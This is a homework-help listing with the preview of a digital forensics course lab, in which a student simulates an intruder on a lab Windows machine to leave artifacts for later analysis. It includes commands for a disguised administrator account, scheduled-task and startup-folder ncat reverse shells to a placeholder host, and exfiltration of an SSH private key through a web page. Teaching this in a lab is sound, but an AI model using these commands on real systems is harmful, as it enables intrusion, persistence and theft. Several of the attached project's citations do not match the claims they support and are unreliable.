Description
Please review Scenario and fill in the PowerPoint slides for Project 2Please include bullet points as well as notes so that I may read it as a scriptThis project has to be narrated so it is very important the notes read off like a script (about 5 minutes long)I included Project 1 (which is finished) for reference as Project 2 builds off of thatAdd references
Unformatted Attachment Preview
Read Scenario:
An attacker who regularly scans websites with directory buster, or dirb (a built in
Kali Linux tool), finds the hidden URL and then decodes the base64 password.
The attacker then scans the remote system and discovers that the SSH (Secure
Shell – 22) and RDP (Remote Desktop Protocol – 3389) are both open and logs in
with the username and decoded Base64 password through SSH. This initial login
is technically when the Network Intrusion starts. After successfully logging in,
the attacker begins some post-exploitation tasks. The attack creates a second
administrator account, with a space, and add the fake administrator account to
the local administrators group. The hacker then enumerates services and stops a
service. The attacker then creates a scheduled task to beacon to a malicious host
every day. The hacker also adds a malicious batch file to the startup folder of the
Administrator. Finally, the attack becomes a much more serious problem as the
attacker is able to view the Private SSH key and take it out of the network by
adding it to the default.htm file in the hidden directory. In this Project (2), you
will act as the attack, creating artifacts for the Forensic Analyst to discover,
These artifacts will be examined in the final Project (3) in this course.
Digital Forensics
Technology and
Practices:
Note: Voice Narration is required for Project 2
Project 2 – The
Hacker Attacks
CST 640 9040
Example narration
Project 2 – Introduction
• Include Voice Narration in Your Slides
• Talk about the purpose of the Project 2
• Discuss Common Hacker Activity
• Discuss any critical points related to artifacts being created by the attacker
• Erase all of the directions provided in this text box when you submit the project
In our Last Episode – Credentials Extracted
• Make sure that you have done all of the steps in Project 1 for Project 2 to work
• Explain how the hacker got into the system
• Notice the username and the password, encoded, in base 64 is exposed.
• Erase all of the directions provided in this text box when you submit the project
• Post a screenshot of the harvested credentials.
Base64 Decode
• The hacker obtained the credentials from Directory Buster (dirb)
• On Kali, go to Applications , Usual Applications, Internet, Firefox ESR
• Go to https://gchq.github.io/CyberChef/
• Drag From Base64 to the Recipe Column
• Paste the Base64 text into the input field and click bake
• Provide a screenshot of the output
• Erase all of the directions provided in this text box
The attacker will Nmap for more information
• nmap –Pn 10.138.X.X, using the IP address of your Windows machine
• Discuss the relevant Open Ports
• in a few bullet points …
• Erase all of the directions provided in this text box
SSH into the Windows Victim
• ssh –l yournameadmin (That is an l, not a 1)
• enter the password of yourname
• Show your screenshot of your connection to the victim
• Discuss the situation in a few bullet points …
• Erase all of the directions provided in this text box
Add an Administrative Account
• As the attacker, add an Administrative Account to the system called “Administrator “
• net user “Administrator ” P@ssw0rd /add
• net localgroup administrators “Administrator ” /add
• Discuss why the hacker would do this in a few bullet points …
• Erase all of the directions provided in this text box when you submit the project
Stop A Service
• Type net start to enumerate all of the started services.
• Stop the Windows Time Service, by typing net stop “Windows Time” in quotes
• Take a screenshot
• Tell what services that you think a hacker might want to stop and why
• Erase all of the directions provided in this text box
Creating a Scheduled Task (Backdoor)
• Run these commands on your system, replacing yourname.com with yourfirstname.com
• schtasks /create /sc DAILY /tn PROJECT2 /tr “ncat -c yourname.com -e cmd.exe”
• Post your screenshot(s) here
• Discuss the schtasks command
• Tell what task that you think a hacker might want to schedule a task
• Erase all of the directions provided in this text box when you submit the project
Adding a Batch File to Startup
• Run these commands on your system, replacing yourname with your first name
• Post your two screenshot(s) here
• echo ncat -C yourname.com -e cmd.exe > yourname.bat
• copy yourname.bat “c:UsersAdministratorAppDataRoamingMicrosoftWindowsStart
MenuProgramsStartup“
• Note : Replace yourname.bat with yourname
• Discuss the startup folder and why a hacker might leverage it
•Erase all of the directions provided in this text box when you submit the project
• cd c:Program Datassh
Stealing Data
• dir
• type ssh_host_rsa_key
• type ssh_host_rsa_key >> c:inetpubwwwroothiddenindex.htm
• Talk about the significance of the private key
• Erase all of the directions provided in this text box when you submit the project
Data Exfiltration
• On Kali, go to Applications , Usual Applications, Internet, Firefox ESR
• http://10.138.X.X/hidden/index.htm (IP address of your Windows machine)
• Post a Screenshot
• Explain what data exfiltration is
• erase all of the directions provided
Summary
• Talk about the Tools and Technologies used
•Talk about what happened
•Talk about what the hacker did when he got in
References
Digital Forensics
Technology and
Practices:
Project 1 – A Network
Intrusion
CST 640 9040
Chris Noocha
October 22, 2023
Project 1 – Introduction
•The purpose of this presentation is to investigate a network intrusion incident
involving a website administrator hired by Mercury USA.
•The website administrator violated their contract by accessing systems outside of the
allowed RDP protocol. They also created a major security risk by storing credentials in
a hidden, unindexed folder on one of the websites they managed.
• As an extra precaution, they Base64 encoded the password, but an attacker was still
able to uncover this folder and decode the password using directory busting tools like
dirb.
•The website administrator should not have had carte blanche admin access that
allowed them to create hidden folders on websites. Credentials should be stored in
secure repositories, not hidden on random websites.
MARS Linux System
MARS provides a safe, controlled environment to examine the incident and attacker’s
methods (Aslam et al., 2023).
•Using Kali Linux in MARS allows access to a range of security tools for this network
intrusion investigation.
•Kali Linux is a penetration testing and ethical hacking Linux distribution. And Comes
preinstalled with many security and hacking tools like Nmap, Wireshark, John the
Ripper etc.
MARS Windows System
• MARS gives controlled Windows environment to apply investigative skills.
Using Windows 10 desktop in MARS lab environment, Provides access to Windowsbased tools and analysis methods for investigating this incident (Umbaugh, 2023).
•IP address is 10.138.6.255 with subnet mask 255.255.240.0 and default gateway
10.138.0.1, Can examine Windows event logs, registry, file system, etc. for artifacts.
IIS Setup
•IIS stands for Internet Information Services, Web server application developed by
Microsoft for Windows systems.
•Allows hosting web applications, sites, and services on Windows servers.
•Supports HTTP, HTTPS, FTP, SSL, CGI, ASP.NET, and other protocols
•Includes authentication, authorization, and security features
•IIS Allows centralized and remote management of web content.
Security Policy Changes
•Password policies enforce complexity and strength requirements. This makes passwords
much harder for attackers to guess or crack through brute force attacks.
•Can require minimum length, mix of characters, change frequency. Setting password
requirements prevents the use of simple, weak, or repetitive passwords.
•Prevents use of common or repetitive passwords. Password policies block easily guessed
passwords like “password123” to improve security.
•Locks accounts after repeated failed login attempts. Account lockouts upon too many failed
logins thwart brute force password cracking attempts.
Adding an Administrative Account
⚫
⚫
The net user command in Windows is used to create and manage user accounts. It
allows creating a new user, setting a password, and configuring account options from
the command line.
Specific parameters like /add can be used with net user to add a new user account to
the system as shown in the screenshot where a chrisadmin account was created.
The net localgroup command manages local groups on a Windows system including
adding and removing members (Thomas, 2022).
⚫
It can add user accounts to the built-in Administrators group to grant them full admin
privileges on the local system.
Base64 Lesson
• CyberChef is an online tool for encryption, encoding,
compression, and data analysis. It contains over 300
operations including Base64 encoding and decoding.
•Base64 is an encoding scheme that converts binary data
into a text format using 64 characters. It is commonly
used to encode passwords, attachments, and other data
for transmission.
• CyberChef makes it easy to encode or decode Base64
strings for security tasks like password storage or data
obfuscation.
Website Misconfiguration
•
dirb attack on the Windows Server
•
Credentials Extracted
•Improper permissions – To many permissive permissions on files/folders can let attackers
access sensitive data or upload malicious code.
•Unpatched software – Running outdated CMS, plugins, themes with known vulnerabilities
provides entry for exploits.
•Default credentials – Failure to change default usernames and passwords for admin panels
gives access to attackers.
•Information leakage – Revealing directory structures, source code comments, or stack traces
aids reconnaissance.
Summary
•
Tools like Kali Linux, Windows forensics, and CyberChef enabled investigation. This allowed thorough examination
of the incident using specialized security software.
• Website administrator improperly stored credentials in Base64 encoded file. This risky behavior violated contract
terms and created a security vulnerability.
• Attacker used Kali Linux tools for directory busting to find hidden folder. Common hacking tools and techniques
exposed the administrator’s poor security practices.
• Base64 encoding was decrypted with CyberChef to reveal credentials. The weak obfuscation was easily reversed,
compromising the entire system.
• Incident shows importance of access controls, credential management, and monitoring. Standard security best
practices could have prevented or reduced impact of the intrusion.
References
Aslam, M. M., Tufail, A., Kim, K. H., Apong, R. A. A. H. M., & Raza, M. T. (2023). A Comprehensive Study on
Cyber Attacks in Communication Networks in Water Purification and Distribution Plants: Challenges,
Vulnerabilities, and Future Prospects. Sensors, 23(18), 7999.
Umbaugh, S. E. (2023). Digital image processing and analysis: computer vision and image analysis. CRC
Press.
Thomas, O. (2022). Exam Ref AZ-801 Configuring Windows Server Hybrid Advanced Services. Microsoft
Press.
Purchase answer to see full
attachment
